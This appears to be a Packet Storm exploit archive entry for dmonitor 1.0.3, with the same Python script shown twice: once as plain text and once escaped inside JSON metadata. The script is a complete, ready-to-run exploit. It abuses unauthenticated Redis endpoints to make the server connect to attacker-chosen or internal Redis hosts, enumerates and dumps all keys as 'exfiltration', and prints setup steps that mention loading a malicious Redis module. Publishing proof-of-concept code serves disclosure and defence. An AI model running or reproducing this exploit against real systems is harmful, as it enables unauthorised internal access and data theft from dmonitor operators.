📄 dmonitor 1.0.3 Server-Side Request Forgery / Redis Enumeration

Description

Proof of concept demonstration exploit for dmonitor version 1.0.3 that leverages an unauthenticated server-side request forgery vulnerability to demonstrate redis access and data enumeration...

Visit Original Source

Basic Information

ID PACKETSTORM:222360

Published Jun 1, 2026 at 00:00

Affected Product

Affected Versions ==================================================================================================================================
| # Title : dmonitor v1.0.3 – Unauthenticated SSRF Leading to Redis Access and Data Enumeration |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://github.com/dhjz/dmonitor |
==================================================================================================================================

[+] Summary : This Python script demonstrates a security vulnerability in dmonitor where unauthenticated requests can influence the application's outbound connections.
The tool interacts with Redis-related API endpoints to assess whether the application can be induced to connect to arbitrary Redis servers specified by a user.

[+] POC :

#!/usr/bin/env python3

import requests
import json
import sys
import argparse
from urllib.parse import urljoin

class DMonitorSSRF:
def __init__(self, target_url):
self.target_url = target_url.rstrip('/')
self.session = requests.Session()
self.redis_connected = False

def init_redis(self, attacker_host, attacker_port=6379, password=""):
"""
Forces dmonitor to connect to attacker-controlled Redis server
"""
endpoint = "/monitor-api/redis/initRedis"
params = {
"host": attacker_host,
"port": attacker_port,
"password": password
}

print(f"[*] Forcing dmonitor to connect to Redis at {attacker_host}:{attacker_port}")

try:
response = self.session.get(
urljoin(self.target_url, endpoint),
params=params,
timeout=10
)

if response.status_code == 200:
data = response.json()
if data.get("code") == 200:
print("[+] Successfully connected to attacker's Redis server")
self.redis_connected = True
return True
else:
print(f"[-] Failed: {data.get('msg')}")
return False
else:
print(f"[-] HTTP {response.status_code}")
return False

except requests.exceptions.RequestException as e:
print(f"[-] Connection error: {e}")
return False

def list_keys(self, keyword=""):
"""
Lists all keys from the connected Redis server
"""
if not self.redis_connected:
print("[-] Redis not initialized. Call init_redis() first")
return None

endpoint = "/monitor-api/redis/listKey"
params = {"keyword": keyword}

print(f"[*] Enumerating Redis keys (keyword: '{keyword}')")

try:
response = self.session.get(
urljoin(self.target_url, endpoint),
params=params,
timeout=10
)

if response.status_code == 200:
data = response.json()
if data.get("code") == 200:
keys = data.get("data", [])
print(f"[+] Found {len(keys)} key(s): {keys}")
return keys
else:
print(f"[-] Failed: {data.get('msg')}")
return None
else:
print(f"[-] HTTP {response.status_code}")
return None

except requests.exceptions.RequestException as e:
print(f"[-] Connection error: {e}")
return None

def get_key_value(self, key):
"""
Retrieves the value of a specific key from Redis
"""
if not self.redis_connected:
print("[-] Redis not initialized. Call init_redis() first")
return None

endpoint = "/monitor-api/redis/getByKey"
params = {"key": key}

print(f"[*] Retrieving value for key: '{key}'")

try:
response = self.session.get(
urljoin(self.target_url, endpoint),
params=params,
timeout=10
)

if response.status_code == 200:
data = response.json()
if data.get("code") == 200:
value = data.get("data", {}).get("value")
print(f"[+] Value: {value}")
return value
else:
print(f"[-] Failed: {data.get('msg')}")
return None
else:
print(f"[-] HTTP {response.status_code}")
return None

except requests.exceptions.RequestException as e:
print(f"[-] Connection error: {e}")
return None

def full_exploit(self, attacker_host, attacker_port=6379):
"""
Complete exploit chain
"""
print("\n" + "="*60)
print("dmonitor v1.0.3 - Unauthenticated SSRF Exploit")
print("="*60 + "\n")
if not self.init_redis(attacker_host, attacker_port):
print("[-] Exploit failed at initialization stage")
return False
keys = self.list_keys()
if not keys:
print("[-] No keys found or enumeration failed")
return False
print("\n[*] Exfiltrating data:")
print("-" * 40)
for key in keys:
value = self.get_key_value(key)
if value:
print(f" {key} => {value}")

print("\n[+] Exploit completed successfully!")
return True

def internal_scan(self, target_host, target_port, redis_command=""):
"""
SSRF to internal Redis servers
"""
print(f"[*] Attempting to connect to internal Redis: {target_host}:{target_port}")

if self.init_redis(target_host, target_port):
print("[+] Successfully connected to internal Redis server")
return self.list_keys()
return None

def setup_attacker_redis():
"""
Instructions for setting up attacker's Redis server
"""
print("\n[!] Attacker Redis Server Setup:")
print(" # Install Redis if not already installed")
print(" $ sudo apt install redis-server # Debian/Ubuntu")
print(" $ brew install redis # macOS")
print(" # Or download from https://redis.io/download")
print("\n # Start Redis server")
print(" $ redis-server --port 6379")
print("\n # Set test data")
print(" $ redis-cli set test_key \"SSRF_CONFIRMED\"")
print(" $ redis-cli set sensitive_data \"SECRET_VALUE\"")
print("\n # For advanced exploitation, set up malicious Redis module")
print(" $ redis-cli MODULE LOAD /path/to/malicious.so")
print("-" * 60)

def main():
parser = argparse.ArgumentParser(description='dmonitor v1.0.3 SSRF Exploit')
parser.add_argument('-t', '--target', required=True,
help='Target dmonitor URL (e.g., http://192.168.1.102:40001)')
parser.add_argument('-a', '--attacker-host', required=True,
help='Attacker-controlled Redis server IP')
parser.add_argument('-p', '--attacker-port', default=6379, type=int,
help='Attacker Redis port (default: 6379)')
parser.add_argument('-i', '--internal-scan', nargs=2, metavar=('HOST', 'PORT'),
help='Scan internal Redis server (SSRF to internal)')
parser.add_argument('--password', default='',
help='Redis password if required')

args = parser.parse_args()
if len(sys.argv) == 1:
parser.print_help()
setup_attacker_redis()
sys.exit(1)

exploit = DMonitorSSRF(args.target)
if args.internal_scan:
internal_host, internal_port = args.internal_scan
exploit.internal_scan(internal_host, int(internal_port))
else:
exploit.full_exploit(args.attacker_host, args.attacker_port)

if __name__ == "__main__":
main()

Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================

{
    "lastseen": "2026-06-01T18:14:59",
    "description": "Proof of concept demonstration exploit for dmonitor version 1.0.3 that leverages an unauthenticated server-side request forgery vulnerability to demonstrate redis access and data enumeration...",
    "published": "2026-06-01T00:00:00",
    "modified": "2026-06-01T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 dmonitor 1.0.3 Server-Side Request Forgery / Redis Enumeration",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:222360",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [],
    "sourceData": "==================================================================================================================================\n    | # Title     : dmonitor v1.0.3 \u2013 Unauthenticated SSRF Leading to Redis Access and Data Enumeration                              |\n    | # Author    : indoushka                                                                                                        |\n    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                 |\n    | # Vendor    : https://github.com/dhjz/dmonitor                                                                                 |\n    ==================================================================================================================================\n    \n    [+] Summary    : This Python script demonstrates a security vulnerability in dmonitor where unauthenticated requests can influence the application's outbound connections. \n                     The tool interacts with Redis-related API endpoints to assess whether the application can be induced to connect to arbitrary Redis servers specified by a user.\n    \t\t\t\t \n    [+] POC        : \n    \n    #!/usr/bin/env python3\n    \n    import requests\n    import json\n    import sys\n    import argparse\n    from urllib.parse import urljoin\n    \n    class DMonitorSSRF:\n        def __init__(self, target_url):\n            self.target_url = target_url.rstrip('/')\n            self.session = requests.Session()\n            self.redis_connected = False\n        \n        def init_redis(self, attacker_host, attacker_port=6379, password=\"\"):\n            \"\"\"\n            Forces dmonitor to connect to attacker-controlled Redis server\n            \"\"\"\n            endpoint = \"/monitor-api/redis/initRedis\"\n            params = {\n                \"host\": attacker_host,\n                \"port\": attacker_port,\n                \"password\": password\n            }\n            \n            print(f\"[*] Forcing dmonitor to connect to Redis at {attacker_host}:{attacker_port}\")\n            \n            try:\n                response = self.session.get(\n                    urljoin(self.target_url, endpoint),\n                    params=params,\n                    timeout=10\n                )\n                \n                if response.status_code == 200:\n                    data = response.json()\n                    if data.get(\"code\") == 200:\n                        print(\"[+] Successfully connected to attacker's Redis server\")\n                        self.redis_connected = True\n                        return True\n                    else:\n                        print(f\"[-] Failed: {data.get('msg')}\")\n                        return False\n                else:\n                    print(f\"[-] HTTP {response.status_code}\")\n                    return False\n                    \n            except requests.exceptions.RequestException as e:\n                print(f\"[-] Connection error: {e}\")\n                return False\n        \n        def list_keys(self, keyword=\"\"):\n            \"\"\"\n            Lists all keys from the connected Redis server\n            \"\"\"\n            if not self.redis_connected:\n                print(\"[-] Redis not initialized. Call init_redis() first\")\n                return None\n                \n            endpoint = \"/monitor-api/redis/listKey\"\n            params = {\"keyword\": keyword}\n            \n            print(f\"[*] Enumerating Redis keys (keyword: '{keyword}')\")\n            \n            try:\n                response = self.session.get(\n                    urljoin(self.target_url, endpoint),\n                    params=params,\n                    timeout=10\n                )\n                \n                if response.status_code == 200:\n                    data = response.json()\n                    if data.get(\"code\") == 200:\n                        keys = data.get(\"data\", [])\n                        print(f\"[+] Found {len(keys)} key(s): {keys}\")\n                        return keys\n                    else:\n                        print(f\"[-] Failed: {data.get('msg')}\")\n                        return None\n                else:\n                    print(f\"[-] HTTP {response.status_code}\")\n                    return None\n                    \n            except requests.exceptions.RequestException as e:\n                print(f\"[-] Connection error: {e}\")\n                return None\n        \n        def get_key_value(self, key):\n            \"\"\"\n            Retrieves the value of a specific key from Redis\n            \"\"\"\n            if not self.redis_connected:\n                print(\"[-] Redis not initialized. Call init_redis() first\")\n                return None\n                \n            endpoint = \"/monitor-api/redis/getByKey\"\n            params = {\"key\": key}\n            \n            print(f\"[*] Retrieving value for key: '{key}'\")\n            \n            try:\n                response = self.session.get(\n                    urljoin(self.target_url, endpoint),\n                    params=params,\n                    timeout=10\n                )\n                \n                if response.status_code == 200:\n                    data = response.json()\n                    if data.get(\"code\") == 200:\n                        value = data.get(\"data\", {}).get(\"value\")\n                        print(f\"[+] Value: {value}\")\n                        return value\n                    else:\n                        print(f\"[-] Failed: {data.get('msg')}\")\n                        return None\n                else:\n                    print(f\"[-] HTTP {response.status_code}\")\n                    return None\n                    \n            except requests.exceptions.RequestException as e:\n                print(f\"[-] Connection error: {e}\")\n                return None\n        \n        def full_exploit(self, attacker_host, attacker_port=6379):\n            \"\"\"\n            Complete exploit chain\n            \"\"\"\n            print(\"\\n\" + \"=\"*60)\n            print(\"dmonitor v1.0.3 - Unauthenticated SSRF Exploit\")\n            print(\"=\"*60 + \"\\n\")\n            if not self.init_redis(attacker_host, attacker_port):\n                print(\"[-] Exploit failed at initialization stage\")\n                return False\n            keys = self.list_keys()\n            if not keys:\n                print(\"[-] No keys found or enumeration failed\")\n                return False\n            print(\"\\n[*] Exfiltrating data:\")\n            print(\"-\" * 40)\n            for key in keys:\n                value = self.get_key_value(key)\n                if value:\n                    print(f\"  {key} => {value}\")\n            \n            print(\"\\n[+] Exploit completed successfully!\")\n            return True\n        \n        def internal_scan(self, target_host, target_port, redis_command=\"\"):\n            \"\"\"\n            SSRF to internal Redis servers\n            \"\"\"\n            print(f\"[*] Attempting to connect to internal Redis: {target_host}:{target_port}\")\n            \n            if self.init_redis(target_host, target_port):\n                print(\"[+] Successfully connected to internal Redis server\")\n                return self.list_keys()\n            return None\n    \n    def setup_attacker_redis():\n        \"\"\"\n        Instructions for setting up attacker's Redis server\n        \"\"\"\n        print(\"\\n[!] Attacker Redis Server Setup:\")\n        print(\"    # Install Redis if not already installed\")\n        print(\"    $ sudo apt install redis-server  # Debian/Ubuntu\")\n        print(\"    $ brew install redis             # macOS\")\n        print(\"    # Or download from https://redis.io/download\")\n        print(\"\\n    # Start Redis server\")\n        print(\"    $ redis-server --port 6379\")\n        print(\"\\n    # Set test data\")\n        print(\"    $ redis-cli set test_key \\\"SSRF_CONFIRMED\\\"\")\n        print(\"    $ redis-cli set sensitive_data \\\"SECRET_VALUE\\\"\")\n        print(\"\\n    # For advanced exploitation, set up malicious Redis module\")\n        print(\"    $ redis-cli MODULE LOAD /path/to/malicious.so\")\n        print(\"-\" * 60)\n    \n    def main():\n        parser = argparse.ArgumentParser(description='dmonitor v1.0.3 SSRF Exploit')\n        parser.add_argument('-t', '--target', required=True, \n                            help='Target dmonitor URL (e.g., http://192.168.1.102:40001)')\n        parser.add_argument('-a', '--attacker-host', required=True,\n                            help='Attacker-controlled Redis server IP')\n        parser.add_argument('-p', '--attacker-port', default=6379, type=int,\n                            help='Attacker Redis port (default: 6379)')\n        parser.add_argument('-i', '--internal-scan', nargs=2, metavar=('HOST', 'PORT'),\n                            help='Scan internal Redis server (SSRF to internal)')\n        parser.add_argument('--password', default='',\n                            help='Redis password if required')\n        \n        args = parser.parse_args()\n        if len(sys.argv) == 1:\n            parser.print_help()\n            setup_attacker_redis()\n            sys.exit(1)\n        \n        exploit = DMonitorSSRF(args.target)\n        if args.internal_scan:\n            internal_host, internal_port = args.internal_scan\n            exploit.internal_scan(internal_host, int(internal_port))\n        else:\n            exploit.full_exploit(args.attacker_host, args.attacker_port)\n    \n    if __name__ == \"__main__\":\n        main()\n    \t\n    Greetings to :==============================================================================\n    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|\n    ============================================================================================",
    "sourceHref": "https://packetstorm.news/download/222360",
    "cvss": {
        "score": 0,
        "severity": "NONE",
        "vector": "NONE",
        "version": "NONE"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/222360/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

📄 dmonitor 1.0.3 Server-Side Request Forgery / Redis Enumeration_PACKETSTORM:222360

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply